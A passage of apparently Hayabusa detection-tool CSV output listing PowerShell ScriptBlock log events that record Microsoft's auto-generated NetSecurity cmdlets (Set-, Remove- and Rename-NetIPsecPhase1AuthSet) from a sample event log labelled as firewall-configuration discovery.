$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 
'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
